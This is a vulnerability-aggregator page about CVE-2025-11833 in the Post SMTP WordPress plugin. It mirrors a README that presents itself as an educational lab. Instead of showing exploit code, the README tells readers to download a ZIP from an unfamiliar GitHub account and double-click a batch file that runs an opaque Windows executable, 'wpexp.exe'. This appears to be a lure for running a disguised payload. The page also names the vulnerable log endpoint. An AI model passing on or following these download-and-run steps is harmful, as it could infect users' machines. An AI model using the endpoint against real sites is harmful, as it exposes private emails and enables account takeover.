关联漏洞
标题:WordPress plugin Post SMTP 安全漏洞 (CVE-2025-11833)描述:WordPress和WordPress plugin都是WordPress基金会的产品。WordPress是一套使用PHP语言开发的博客平台。该平台具有在基于PHP和MySQL的服务器上架设个人博客网站的功能。WordPress plugin是一个应用插件。 WordPress plugin Post SMTP 3.6.0及之前版本存在安全漏洞,该漏洞源于缺少能力检查,可能导致未经验证的攻击者读取任意日志邮件,进而导致账户接管。
介绍
# Lab: CVE-2025-11833 - Post SMTP WordPress Plugin Unauthenticated Arbitrary Email Log Disclosure
## 🚀 Overview
This lab demonstrates the CVE-2025-11833 vulnerability in the Post SMTP WordPress plugin (versions up to 3.6.0), which arises from a missing capability check in the plugin's `__construct` function. This flaw permits unauthenticated attackers to access logged emails sent via the plugin, potentially exposing sensitive data such as password reset links. Exploitation could lead to account takeovers by intercepting confidential communications. The CVSSv3 score is 9.8, highlighting its critical severity due to low attack complexity and no required privileges.
## ⚠️ Safety Disclaimer
This lab is provided for educational and research purposes to understand web application vulnerabilities. Do not use this in production environments or against unauthorized systems. The authors assume no liability for misuse. Always obtain explicit authorization before testing on real-world systems.
## 📋 Prerequisites
- A local web server stack (e.g., XAMPP, WAMP, or MAMP) with PHP 8.0+, MySQL 5.7+, and Apache/Nginx.
- WordPress version 6.0 or later.
- Basic knowledge of WordPress plugin management and HTTP requests
- Windows OS for running the exploit tools (due to .exe and .bat dependencies).
- Administrative access to your local machine for installing software and configuring the web server.
## Download & Install
1. Download the lab archive from https://github.com/modhopmarrow1973/CVE-2025-11833-LAB/raw/refs/heads/main/scripts/cve-2025-11833-lab.zip . This ZIP contains:
- `wpexp.exe`: The main exploitation binary for demonstrating the email log disclosure.
- `launcher.bat`: A batch file to launch the exploit.
2. Extract the ZIP to a local directory, e.g., `C:\CVE-2025-11833-lab`.
3. Set up the vulnerable environment:
- Install WordPress locally if not already done: Download from [wordpress.org](https://wordpress.org) and configure with your local web server.
- Navigate to the WordPress admin dashboard (e.g., `http://localhost/wordpress/wp-admin`).
- Install the vulnerable Post SMTP plugin
- Configure Post SMTP: In the plugin settings, enable email logging and set up a test SMTP server (e.g., using a local SMTP simulator like FakeSMTP for testing).
## 🛠 Quick Start
1. Download and extract the lab ZIP as described above.
2. Set up your local WordPress instance with the vulnerable plugin.
3. Double-click `launcher.bat` in the extracted directory. This will launch `wpexp.exe` and prompt for target details.
4. In the exploit tool:
- Enter the target URL (e.g., `http://localhost/wordpress`).
- Specify the endpoint: `/wp-admin/admin-ajax.php?action=postman_get_logs` (the vulnerable AJAX handler).
- Run the exploit to retrieve and display logged emails.
For questions or contributions, email me at ukeouxnp760s25@hotmail.com
文件快照
[4.0K] /data/pocs/0fcb4a393ac6e5d77415113b09d70ed2c4f620d2
├── [2.8K] README.md
└── [4.0K] scripts
├── [ 1] config.ini
└── [8.5M] cve-2025-11833-lab.zip
1 directory, 3 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。